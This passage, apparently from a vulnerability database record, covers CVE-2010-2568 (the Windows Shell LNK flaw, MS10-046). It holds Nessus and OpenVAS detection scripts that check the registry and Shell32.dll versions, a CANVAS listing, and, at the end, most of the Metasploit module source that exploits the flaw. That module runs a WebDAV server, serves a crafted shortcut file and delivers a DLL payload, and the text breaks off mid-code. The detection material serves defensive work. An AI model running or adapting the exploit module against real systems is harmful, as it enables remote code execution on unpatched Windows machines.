value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"smb_nt_ms10-046.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"audit.inc\");\n\n\nget_kb_item_or_exit('SMB/WindowsVersion');\nif (hotfix_check_sp(xp:4, win2003:3, vista:3, win7:1) <= 0)\n exit(0, 'Host is not affected based on its version / service pack.');\nif (!get_kb_item(\"SMB/Missing/MS10-046\")) exit(0, \"The host is not affected because the 'SMB/Missing/MS10-046' KB item is missing.\");\n\n# Connect to the appropriate share.\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\nport = kb_smb_transport();\n\nif(! 
smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:\"IPC$\");\nif (rc != 1)\n{\n NetUseDel();\n exit(1, \"Can't connect to IPC$ share.\");\n}\n\nhkcr = RegConnectRegistry(hkey:HKEY_CLASS_ROOT);\nif (isnull(hkcr))\n{\n NetUseDel();\n exit(1, \"Can't connect to remote registry.\");\n}\n\nkeys = make_list(\n 'lnkfile\\\\shellex\\\\IconHandler',\n 'piffile\\\\shellex\\\\IconHandler'\n);\n\nvuln = make_array();\n\nforeach key (keys)\n{\n key_h = RegOpenKey(handle:hkcr, key:key, mode:MAXIMUM_ALLOWED);\n icon_handler = NULL;\n\n if (!isnull(key_h))\n {\n value = RegQueryValue(handle:key_h, item:NULL);\n if (!isnull(value[1])) vuln[key] = value[1];\n RegCloseKey(handle:key_h);\n }\n}\n\nRegCloseKey(handle:hkcr);\nNetUseDel();\n\nif (max_index(keys(vuln)) > 0)\n{\n if (report_verbosity > 0)\n {\n if (max_index(keys(vuln)) > 1) s = 'ies';\n else s = 'y';\n report =\n '\\nAccording to the following registry entr'+s+', displaying shortcut' +\n '\\nicons has not been disabled :\\n';\n\n foreach key (keys(vuln))\n {\n report +=\n '\\n Key : HKEY_CLASS_ROOT\\\\' + key +\n '\\n Value : ' + vuln[key] + '\\n';\n }\n\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse exit(0, 'Displaying shortcut icons has been disabled.');\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2019-05-29T17:19:30", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2568"], "description": "**Name**| windows_shell_lnk \n---|--- \n**CVE**| CVE-2010-2568 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| windows_shell_lnk \n**Notes**| CVE Name: CVE-2010-2568 \nVENDOR: Microsoft \nNotes: \n \nVersionsAffected: Windows XP, Windows 2003, Windows Vista, Windows 2008, Windows 7 \nRepeatability: Infinite \nReferences: ['http://www.microsoft.com/technet/security/advisory/2286198.mspx'] \nDate public: 
07/20/2010 \nMSADV: MS10-0XX \n\n", "edition": 2, "modified": "2010-07-22T05:43:00", "published": "2010-07-22T05:43:00", "id": "WINDOWS_SHELL_LNK", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/windows_shell_lnk", "type": "canvas", "title": "Immunity Canvas: WINDOWS_SHELL_LNK", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-04-27T19:23:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2568"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-046.", "modified": "2020-04-23T00:00:00", "published": "2010-08-04T00:00:00", "id": "OPENVAS:1361412562310902226", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902226", "type": "openvas", "title": "Microsoft Windows Shell Remote Code Execution Vulnerability (2286198)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Shell Remote Code Execution Vulnerability (2286198)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Updated By: Madhuri D <dmadhuri@secpod.com> on 2010-11-13\n# - To detect file version 'Shell32.dll' on vista, win 2008 and win 7\n#\n# Copyright:\n# Copyright (C) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902226\");\n script_version(\"2020-04-23T12:22:09+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 12:22:09 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-08-04 08:26:41 +0200 (Wed, 04 Aug 2010)\");\n script_cve_id(\"CVE-2010-2568\");\n script_bugtraq_id(41732);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Windows Shell Remote Code Execution Vulnerability (2286198)\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/940193\");\n script_xref(name:\"URL\", value:\"http://www.ivanlef0u.tuxfamily.org/?p=411\");\n script_xref(name:\"URL\", value:\"http://isc.sans.edu/diary.html?storyid=9190\");\n script_xref(name:\"URL\", value:\"http://isc.sans.edu/diary.html?storyid=9181\");\n script_xref(name:\"URL\", value:\"http://community.websense.com/blogs/securitylabs/archive/2010/07/20/microsoft-lnk-vulnerability-brief-technical-analysis-cve-2010-2568.aspx\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/registry_enumerated\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to automatically execute\n a malicious binary by tricking a user into browsing a remote network or WebDAV\n share, or opening in Windows Explorer a removable drive containing a 
specially\n crafted shortcut file.\");\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7\n\n - Microsoft Windows XP Service Pack 3 and prior\n\n - Microsoft Windows 2003 Service Pack 2 and prior\n\n - Microsoft Windows Vista Service Pack 1/2 and prior\n\n - Microsoft Windows Server 2008 Service Pack 1/2 and prior\");\n script_tag(name:\"insight\", value:\"The flaw is due to an error in Windows 'Shell' when parsing shortcuts\n (.lnk or .pif), certain parameters are not properly validated when attempting\n to load the icon.\");\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS10-046.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-046\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win7:1, win2008:3) <= 0){\n exit(0);\n}\n\nif(hotfix_missing(name:\"2286198\") == 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(sysPath)\n{\n dllVer = fetch_file_version(sysPath:sysPath, file_name:\"Shell32.dll\");\n if(!dllVer){\n exit(0);\n }\n}\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 3\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.2900.6018\")){\n report = report_fixed_ver(installed_version:dllVer, fixed_version:\"6.0.2900.6018\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = 
get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.3790.4751\")){\n report = report_fixed_ver(installed_version:dllVer, fixed_version:\"6.0.3790.4751\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nsysPath = smb_get_system32root();\nif(sysPath)\n{\n dllVer = fetch_file_version(sysPath:sysPath, file_name:\"Shell32.dll\");\n if(!dllVer){\n exit(0);\n }\n}\n\nif(hotfix_check_sp(winVista:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.6001.18505\")){\n report = report_fixed_ver(installed_version:dllVer, fixed_version:\"6.0.6001.18505\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.6002.18287\")){\n report = report_fixed_ver(installed_version:dllVer, fixed_version:\"6.0.6002.18287\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.6001.18505\")){\n report = report_fixed_ver(installed_version:dllVer, fixed_version:\"6.0.6001.18505\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.6002.18287\")){\n report = report_fixed_ver(installed_version:dllVer, fixed_version:\"6.0.6002.18287\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, 
data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win7:1) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"6.1.7600.16644\")){\n report = report_fixed_ver(installed_version:dllVer, fixed_version:\"6.1.7600.16644\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:09:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2568"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-046.", "modified": "2017-04-11T00:00:00", "published": "2010-08-04T00:00:00", "id": "OPENVAS:902226", "href": "http://plugins.openvas.org/nasl.php?oid=902226", "type": "openvas", "title": "Microsoft Windows Shell Remote Code Execution Vulnerability (2286198)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms10-046.nasl 5934 2017-04-11 12:28:28Z antu123 $\n#\n# Microsoft Windows Shell Remote Code Execution Vulnerability (2286198)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Updated By: Madhuri D <dmadhuri@secpod.com> on 2010-11-13\n# - To detect file version 'Shell32.dll' on vista, win 2008 and win 7\n# \n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_id(902226);\n script_version(\"$Revision: 5934 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-11 14:28:28 +0200 (Tue, 11 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-08-04 08:26:41 +0200 (Wed, 04 Aug 2010)\");\n script_cve_id(\"CVE-2010-2568\");\n script_bugtraq_id(41732);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Windows Shell Remote Code Execution Vulnerability (2286198)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/40647\");\n script_xref(name : \"URL\" , value : \"http://www.kb.cert.org/vuls/id/940193\");\n script_xref(name : \"URL\" , value : \"http://www.ivanlef0u.tuxfamily.org/?p=411\");\n script_xref(name : \"URL\" , value : \"http://isc.sans.edu/diary.html?storyid=9190\");\n script_xref(name : \"URL\" , value : \"http://isc.sans.edu/diary.html?storyid=9181\");\n script_xref(name : \"URL\" , value : \"http://community.websense.com/blogs/securitylabs/archive/2010/07/20/microsoft-lnk-vulnerability-brief-technical-analysis-cve-2010-2568.aspx\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name : \"impact\" , value : \"Successful exploitation could allow remote attackers to automatically execute\n a malicious binary by tricking a user into browsing a remote network or 
WebDAV\n share, or opening in Windows Explorer a removable drive containing a specially\n crafted shortcut file.\n Impact Level: System\");\n script_tag(name : \"affected\" , value : \"Micorsoft Windows 7\n Microsoft Windows XP Service Pack 3 and prior.\n Microsoft Windows 2003 Service Pack 2 and prior.\n Microsoft Windows Vista Service Pack 1/2 and prior.\n Microsoft Windows Server 2008 Service Pack 1/2 and prior.\");\n script_tag(name : \"insight\" , value : \"The flaw is due to an error in Windows 'Shell' when parsing shortcuts\n (.lnk or .pif), certain parameters are not properly validated when attempting\n to load the icon.\");\n script_tag(name : \"solution\" , value : \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://www.microsoft.com/technet/security/Bulletin/MS10-046.mspx\");\n script_tag(name : \"summary\" , value : \"This host is missing a critical security update according to\n Microsoft Bulletin MS10-046.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win7:1, win2008:3) <= 0){\n exit(0);\n}\n\n# Check for MS10-046 Hotfix\nif(hotfix_missing(name:\"2286198\") == 0){\n exit(0);\n}\n\n## Get System32 path\nsysPath = smb_get_system32root();\nif(sysPath)\n{\n dllVer = fetch_file_version(sysPath, file_name:\"Shell32.dll\");\n if(!dllVer){\n exit(0);\n }\n}\n\n# Windows XP\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 3\" >< SP)\n {\n # Grep for Shell32.dll version < 6.0.2900.6018\n if(version_is_less(version:dllVer, test_version:\"6.0.2900.6018\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n# Windows 2003\nelse 
if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for Shell32.dll version < 6.0.3790.4751\n if(version_is_less(version:dllVer, test_version:\"6.0.3790.4751\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Get System32 path\nsysPath = smb_get_system32root();\nif(sysPath)\n{\n dllVer = fetch_file_version(sysPath, file_name:\"Shell32.dll\");\n if(!dllVer){\n exit(0);\n }\n}\n\n# Windows Vista\nif(hotfix_check_sp(winVista:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n # Grep for Shell32.dll version < 6.0.6001.18505 \n if(version_is_less(version:dllVer, test_version:\"6.0.6001.18505\")){\n security_message(0);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for Shell32.dll version < 6.0.6002.18287\n if(version_is_less(version:dllVer, test_version:\"6.0.6002.18287\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n# Windows Server 2008\nelse if(hotfix_check_sp(win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n # Grep for Shell32.dll version < 6.0.6001.18505\n if(version_is_less(version:dllVer, test_version:\"6.0.6001.18505\")){\n security_message(0);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for Shell32.dll version < 6.0.6002.18287\n if(version_is_less(version:dllVer, test_version:\"6.0.6002.18287\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n# Windows 7\nelse if(hotfix_check_sp(win7:1) > 0)\n{\n # Grep for Shell32.dll version < 6.1.7600.16644\n if(version_is_less(version:dllVer, test_version:\"6.1.7600.16644\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T00:10:11", "description": "Microsoft Windows Shell LNK Code Execution. 
CVE-2010-2568. Remote exploit for windows platform", "published": "2010-09-21T00:00:00", "type": "exploitdb", "title": "Microsoft Windows Shell LNK Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2568"], "modified": "2010-09-21T00:00:00", "id": "EDB-ID:16574", "href": "https://www.exploit-db.com/exploits/16574/", "sourceData": "##\r\n# $Id: ms10_046_shortcut_icon_dllloader.rb 10404 2010-09-21 00:13:30Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\t#\r\n\t# This module acts as an HTTP server\r\n\t#\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::EXE\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t\t=> 'Microsoft Windows Shell LNK Code Execution',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the handling of Windows\r\n\t\t\t\tShortcut files (.LNK) that contain an icon resource pointing to a\r\n\t\t\t\tmalicious DLL. 
This module creates a WebDAV service that can be used\r\n\t\t\t\tto run an arbitrary payload when accessed as a UNC path.\r\n\t\t\t},\r\n\t\t\t'Author'\t\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'hdm', # Module itself\r\n\t\t\t\t\t'jduck', # WebDAV implementation, UNCHOST var\r\n\t\t\t\t\t'B_H' # Clean LNK template\r\n\t\t\t\t],\r\n\t\t\t'License'\t\t=> MSF_LICENSE,\r\n\t\t\t'Version'\t\t=> '$Revision: 10404 $',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2010-2568'],\r\n\t\t\t\t\t['OSVDB', '66387'],\r\n\t\t\t\t\t['MSB', 'MS10-046'],\r\n\t\t\t\t\t['URL', 'http://www.microsoft.com/technet/security/advisory/2286198.mspx']\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload'\t\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space'\t=> 2048,\r\n\t\t\t\t},\r\n\t\t\t'Platform'\t\t=> 'win',\r\n\t\t\t'Targets'\t\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic',\t{ } ]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jul 16 2010',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptPort.new(\t'SRVPORT',\t\t [ true, \"The daemon port to listen on (do not change)\", 80 ]),\r\n\t\t\t\tOptString.new(\t'URIPATH',\t\t [ true, \"The URI to use (do not change).\", \"/\" ]),\r\n\t\t\t\tOptString.new( 'UNCHOST', [ false, \"The host portion of the UNC path to provide to clients (ex: 1.2.3.4).\" ])\r\n\t\t\t], self.class)\r\n\r\n\t\tderegister_options('SSL', 'SSLVersion') # Just for now\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tcase request.method\r\n\t\twhen 'OPTIONS'\r\n\t\t\tprocess_options(cli, request)\r\n\t\twhen 'PROPFIND'\r\n\t\t\tprocess_propfind(cli, request)\r\n\t\twhen 'GET'\r\n\t\t\tprocess_get(cli, request)\r\n\t\telse\r\n\t\t\tprint_error(\"Unexpected request method encountered: #{request.method}\")\r\n\t\t\tresp = create_response(404, \"Not Found\")\r\n\t\t\tresp.body = \"\"\r\n\t\t\tresp['Content-Type'] = 
'text/html'\r\n\t\t\tcli.send_response(resp)\r\n\t\tend\r\n\r\n\tend\r\n\r\n\tdef process_get(cli, request)\r\n\r\n\t\tmyhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\r\n\t\twebdav = \"\\\\\\\\#{myhost}\\\\\"\r\n\r\n\t\tif (request.uri =~ /\\.dll$/i)\r\n\t\t\tprint_status \"Sending DLL payload #{cli.peerhost}:#{cli.peerport} ...\"\r\n\t\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\t\t\tdata = generate_payload_dll({ :code => p.encoded })\r\n\t\t\tsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tif (request.uri =~ /\\.lnk$/i)\r\n\t\t\tprint_status \"Sending LNK file to #{cli.peerhost}:#{cli.peerport} ...\"\r\n\r\n\t\t\tdata = generate_link(\"#{@exploit_unc}#{@exploit_dll}\")\r\n\r\n\t\t\tsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tprint_status \"Sending UNC redirect to #{cli.peerhost}:#{cli.peerport} ...\"\r\n\t\tresp = create_response(200, \"OK\")\r\n\r\n\t\tresp.body = %Q|<html><head><meta http-equiv=\"refresh\" content=\"0;URL=#{@exploit_unc}\"></head><body></body></html>|\r\n\r\n\t\tresp['Content-Type'] = 'text/html'\r\n\t\tcli.send_response(resp)\r\n\tend\r\n\r\n\t#\r\n\t# OPTIONS requests sent by the WebDav Mini-Redirector\r\n\t#\r\n\tdef process_options(cli, request)\r\n\t\tprint_status(\"Responding to WebDAV OPTIONS request from #{cli.peerhost}:#{cli.peerport}\")\r\n\t\theaders = {\r\n\t\t\t'MS-Author-Via' => 'DAV',\r\n#\t\t\t'DASL' => '<DAV:sql>',\r\n#\t\t\t'DAV' => '1, 2',\r\n\t\t\t'Allow' => 'OPTIONS, GET, PROPFIND',\r\n\t\t\t'Public' => 'OPTIONS, GET, PROPFIND'\r\n\t\t}\r\n\t\tresp = create_response(207, \"Multi-Status\")\r\n\t\tresp.body = \"\"\r\n\t\tresp['Content-Type'] = 'text/xml'\r\n\t\tcli.send_response(resp)\r\n\tend\r\n\r\n\t#\r\n\t# PROPFIND requests sent by the WebDav Mini-Redirector\r\n\t#\r\n\tdef process_propfind(cli, request)\r\n\t\tpath 
= request.uri\r\n\t\tprint_status(\"Received WebDAV PROPFIND request from #{cli.peerhost}:#{cli.peerport} #{path}\")\r\n\t\tbody = ''\r\n\r\n\t\tmy_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\r\n\t\tmy_uri = \"http://#{my_host}/\"\r\n\r\n\t\tif path =~ /\\.dll$/i\r\n\t\t\t# Response for the DLL\r\n\t\t\tprint_status(\"Sending DLL multistatus for #{path} ...\")\r\n\t\t\tbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\">\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}#{@exploit_dll}</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype/>\r\n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate>\r\n<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength>\r\n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified>\r\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n<lp2:executable>T</lp2:executable>\r\n<D:supportedlock>\r\n<D:lockentry>\r\n<D:lockscope><D:exclusive/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n<D:lockentry>\r\n<D:lockscope><D:shared/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n</D:supportedlock>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n</D:multistatus>\r\n|\r\n\r\n\t\t\tresp = create_response(207, \"Multi-Status\")\r\n\t\t\tresp.body = body\r\n\t\t\tresp['Content-Type'] = 'text/xml'\r\n\t\t\tcli.send_response(resp)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tif path =~ /\\.lnk$/i\r\n\t\t\t# Response for the DLL\r\n\t\t\tprint_status(\"Sending DLL multistatus for #{path} ...\")\r\n\t\t\tbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<D:multistatus xmlns:D=\"DAV:\" 
xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\">\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}#{@exploit_lnk}</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype/>\r\n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate>\r\n<lp1:getcontentlength>#{rand(0x100)+128}</lp1:getcontentlength>\r\n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified>\r\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n<lp2:executable>T</lp2:executable>\r\n<D:supportedlock>\r\n<D:lockentry>\r\n<D:lockscope><D:exclusive/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n<D:lockentry>\r\n<D:lockscope><D:shared/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n</D:supportedlock>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>shortcut</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n</D:multistatus>\r\n|\r\n\r\n\t\t\tresp = create_response(207, \"Multi-Status\")\r\n\t\t\tresp.body = body\r\n\t\t\tresp['Content-Type'] = 'text/xml'\r\n\t\t\tcli.send_response(resp)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tif path !~ /\\/$/\r\n\r\n\t\t\tif path.index(\".\")\r\n\t\t\t\tprint_status(\"Sending 404 for #{path} ...\")\r\n\t\t\t\tresp = create_response(404, \"Not Found\")\r\n\t\t\t\tresp['Content-Type'] = 'text/html'\r\n\t\t\t\tcli.send_response(resp)\r\n\t\t\t\treturn\r\n\t\t\telse\r\n\t\t\t\tprint_status(\"Sending 301 for #{path} ...\")\r\n\t\t\t\tresp = create_response(301, \"Moved\")\r\n\t\t\t\tresp[\"Location\"] = path + \"/\"\r\n\t\t\t\tresp['Content-Type'] = 